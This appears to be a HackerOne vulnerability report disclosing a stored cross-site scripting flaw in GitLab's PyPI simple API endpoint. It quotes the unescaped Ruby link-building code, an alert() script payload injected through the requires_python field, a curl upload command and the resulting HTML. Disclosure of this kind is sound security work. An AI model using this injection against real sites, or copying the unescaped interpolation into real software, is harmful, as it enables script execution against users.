Stored XSS on PyPi simple API endpoint
HackerOne report #856836 by vakzz
on 2020-04-23, assigned to @dcouture:
Summary
The recently released PyPi package feature has a new endpoint at /api/:version/projects/:id/packages/pypi/simple/*package_name
which exposes an HTML page listing the package versions. The package_link
's are generated using the following code:
def package_link(url, required_python, filename)
"<a href=\"#{url}\" data-requires-python=\"#{required_python}\">#{filename}</a><br>"
end
The only sanitation on required_python
is that it is less than 50 characters (db constraint), otherwise arbitrary html can be injected.
Steps to reproduce
-
Create project
-
Create a pypi package with
requires_python='"><script>alert(1)</script>'
curl -v "https://token:$TOKEN@gitlab.com/api/v4/projects/18315917/packages/pypi" -F content=@/tmp/lala.txt -F requires_python=2.7 -F version=1 -F name='package_test_1' -F requires_python='">'
````
-
Visit the simple api endpoint and see the injected code: https://gitlab.com/api/v4/projects/18315917/packages/pypi/simple/package_test_1
<!DOCTYPE html> <html> <head> <title>Links for package_test_1</title> </head> <body> <h1>Links for package_test_1</h1> <a href="https://gitlab.com/api/v4/projects/18315917/packages/pypi/files/lala.txt#sha256=" data-requires-python=""><script>alert(1)</script>">lala.txt</a><br> </body> </html>
Currently will be blocked by the csp on gitlab.com
Impact
- An attacker could execute arbitrary javascript by sending a user or getting them to click on a url to the simple api endpoint
Examples
What is the current bug behavior?
The user supplied fields used by the package_presenter
are not all sanitized
What is the expected correct behavior?
All of the user supplied fields in package_presenter
should be sanitized before being turned into html
Output of checks
This bug happens on GitLab.com
Impact
- An attacker could execute arbitrary javascript by sending a user or getting them to click on a url to the simple api endpoint